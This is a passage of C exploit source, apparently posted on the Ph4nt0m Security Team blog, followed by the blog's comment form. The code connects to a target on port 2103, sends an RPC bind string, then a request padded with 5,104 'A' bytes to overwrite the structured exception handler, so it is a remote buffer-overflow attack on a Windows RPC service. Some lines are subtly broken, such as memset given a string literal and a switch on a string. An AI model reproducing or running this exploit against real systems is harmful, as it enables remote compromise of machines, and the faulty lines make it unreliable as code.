         case "p":
            if (strcmp(argv[i+1],"2103")==0) {
               printf("[+] Attacking default port 2103\n");
            } else {
               port=atoi(argv[i+1]);
            }
            break;            
         default:
            printf("[-] Invalid argument: %s\n",argv[i]);
            usage(argv[0]);
            break;
         }
         i++;            
          } else usage(argv[0]);
         }
/********************** attack payload ***************************/
                if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
                {
            fprintf(stderr, "[-] WSAStartup failed.\n");
            WSACleanup();
            exit(1);
                }
                //Sleep(1200);
         s = Make_Connection((char *)target, port, 10);
         if(s<0)
                {
            fprintf(stderr, "[-] connect err.\n");
            exit(1);
                }
               //Send our evil Payload                
        printf("[*]Sending our Payload, Good Luck! ^_^\n");
               printf("[*]Sending RPC Bind String!\n");
               send(s, bind_str, sizeof(bind_str), 0);
               Sleep(1000);
               printf("[*]Sending RPC Request Now!\n");
               memset(buffer, "\x41", sizeof(buffer));  // fil the buffer to
trigger seh
        send(s, request_1, sizeof(request_1), 0);
               send(s, buffer, 5104, 0);   // fil the buffer to trigger seh
               send(s, request_2, sizeof(request_2), 0);


        Sleep(100);
            memset(buffer, 0, sizeof(buffer));
            ret = recv(s, buffer, sizeof(buffer)-1, 0);
               //printf("recv: %s\n", buffer);
               Disconnect(s);
               return 0;

}

[Ph4nt0m] <http://www.ph4nt0m.org/>  
[Ph4nt0m Security Team]
<http://blog.ph4nt0m.org/> 刺@ph4nt0m
Email:  a...@ph4nt0m.org
Technology | Comments(0) | Trackbacks(0) | Reads(8426)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive